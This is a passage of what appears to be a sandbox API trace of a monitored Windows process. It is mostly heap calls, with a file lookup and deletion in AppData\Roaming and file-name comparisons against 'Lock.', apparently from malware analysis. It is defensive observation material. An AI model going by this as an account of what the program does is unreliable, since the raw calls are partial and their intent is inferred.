Flags=0x0, Size=0xc) returned 0x24a9f60 [0199.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0199.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0199.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0199.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0199.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0199.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0199.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0199.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0199.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0199.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0199.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0199.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0199.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0199.895] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.896] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0199.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.897] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.897] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0199.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0199.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.897] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0199.897] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0199.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0199.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.898] FreeLibrary (hLibModule=0x74d40000) returned 1 [0199.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0199.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.898] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0199.898] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0199.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0199.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0199.898] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0199.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0199.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0199.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0199.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0199.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.899] CloseHandle (hObject=0x268) returned 1 [0199.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0199.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0199.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0199.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0199.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0199.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0199.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0199.902] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0199.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0199.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0199.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0199.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0199.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0199.903] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0199.904] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.904] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0199.904] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/JdjU4gAsI 0_L.gif", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JdjU4gAsI 0_L.gif", lpFilePart=0x8bedfc*="JdjU4gAsI 0_L.gif") returned 0x3f [0199.904] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JdjU4gAsI 0_L.gif", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x522e0c50, ftCreationTime.dwHighDateTime=0x1d4cfa5, ftLastAccessTime.dwLowDateTime=0x2da73d0, ftLastAccessTime.dwHighDateTime=0x1d4ce30, ftLastWriteTime.dwLowDateTime=0x2da73d0, ftLastWriteTime.dwHighDateTime=0x1d4ce30, nFileSizeHigh=0x0, nFileSizeLow=0xda8a, dwReserved0=0xbcd, dwReserved1=0x4, cFileName="JdjU4gAsI 0_L.gif", cAlternateFileName="JDJU4G~1.GIF")) returned 0xaa5860 [0199.904] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JdjU4gAsI 0_L.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jdju4gasi 0_l.gif")) returned 1 [0199.906] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x522e0c50, ftCreationTime.dwHighDateTime=0x1d4cfa5, ftLastAccessTime.dwLowDateTime=0x2da73d0, ftLastAccessTime.dwHighDateTime=0x1d4ce30, ftLastWriteTime.dwLowDateTime=0x2da73d0, ftLastWriteTime.dwHighDateTime=0x1d4ce30, nFileSizeHigh=0x0, nFileSizeLow=0xda8a, dwReserved0=0xbcd, dwReserved1=0x4, cFileName="JdjU4gAsI 0_L.gif", cAlternateFileName="JDJU4G~1.GIF")) returned 0 [0199.906] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0199.907] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0199.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0199.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0199.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0199.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0199.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0199.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0199.907] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0199.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0199.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa128 [0199.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0199.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e28 [0199.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0199.908] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0199.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0199.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0199.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0199.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0199.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0199.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0199.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0199.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0199.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0199.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0199.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0199.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0199.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0199.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0199.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0199.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0199.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0199.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0199.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0199.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0199.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x80) returned 0x24f1fe0 [0199.910] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/JdjU4gAsI 0_L.gif", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JdjU4gAsI 0_L.gif", lpFilePart=0x8bf658*="JdjU4gAsI 0_L.gif") returned 0x3f [0199.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0199.910] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JdjU4gAsI 0_L.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jdju4gasi 0_l.gif")) returned 0xffffffff [0199.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0199.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0199.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0199.910] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0199.910] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.911] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0199.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0199.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0199.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0199.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0199.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0199.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0199.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0199.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0199.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0199.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0199.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0199.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0199.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jfoRUvp.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="foRUvp.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0199.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oRUvp.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0199.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RUvp.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0199.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Uvp.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0199.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vp.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0199.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0199.912] HeapFree 